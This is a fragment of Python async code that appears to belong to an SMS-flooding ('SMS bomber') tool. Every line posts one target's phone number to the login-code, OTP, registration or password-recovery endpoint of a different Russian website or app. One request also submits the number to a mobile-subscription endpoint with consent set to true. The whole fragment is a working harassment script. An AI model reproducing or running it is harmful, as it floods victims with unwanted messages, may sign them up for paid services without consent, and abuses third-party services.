			await self.session.post('https://my.drom.ru/sign/recover?return=https%3A%2F%2Fchelyabinsk.drom.ru%2Fauto%2Fall%2F%3Futm_source%3Dyandexdirect%26utm_medium%3Dcpc%26utm_campaign%3Ddrom_74_chelyabinsk_auto-rivals_alldevice_search_handmade%26utm_content%3Ddesktop_search_text_main%26utm_term%3D%25D0%25B0%25D0%25B2%25D1%2582%25D0%25BE%25D1%2580%25D1%2583%2520%25D1%2587%25D0%25B5%25D0%25BB%25D1%258F%25D0%25B1%25D0%25B8%25D0%25BD%25D1%2581%25D0%25BA%26_openstat%3DZGlyZWN0LnlhbmRleC5ydTsxNzY3NTA4MzsxOTMxNzMyNzE4O3lhbmRleC5ydTpwcmVtaXVt%26yclid%3D7777444668347802164%26tcb%3D1609147011',json= {'sign':f"{country_code}{phone}"},headers=self.headers)
			await self.session.post('https://api.like-video.com/likee-activity-flow-micro/commonApi/sendDownloadSms',json = {'telephone': f"{country_code}{phone}", 'lang': "ru"},headers=self.headers)
			await self.session.post('https://24htv.platform24.tv/v2/otps',json = {'phone':f"{country_code}{phone}"},headers=self.headers)
			await self.session.post('https://apteka.magnit.ru/api/personal/auth/code/', json={'phone': f"{country_code}{phone}"},headers=self.headers)
			await self.session.post('https://loymax.ivoin.ru/publicapi/v1.2/Registration/BeginRegistration',json={'password': '', 'login': f"{country_code}{phone}"},headers=self.headers)
			await self.session.post('https://www.rigla.ru/rest/V1/mindbox/account/generateSMS',json={'telephone': f"{country_code}{phone}"},headers=self.headers)
			await self.session.post('https://smotrim.ru/login', json={'phone': f"{country_code}{phone}"},headers=self.headers)
			await self.session.post('https://gdz-ru.work/api/subscriptions/subscribe/45?',params={'return_to': '/subscribe/?return_to=%2Fgdz%2Falgebra%2F8-klass%2Fmuravin', 'book_id': '23143', 'src_host': 'gdz.ltd', 'woid': '275004200', 'msisdn': f"{country_code}{phone}", 'agreement': '1'},headers=self.headers)
			await self.session.post('https://www.dns-shop.ru/auth/auth/fast-authorization/',json={'FastAuthorizationLoginLoadForm[login]': f"{country_code}{phone}", 'FastAuthorizationLoginLoadForm[token]': ''},headers=self.headers)
			await self.session.post('https://durex-ru-backend.prod.moscow.rbdigitalcloud.com/api/v1/users/confirmation_code/',json={'phone': f"{country_code}{phone}"},headers=self.headers)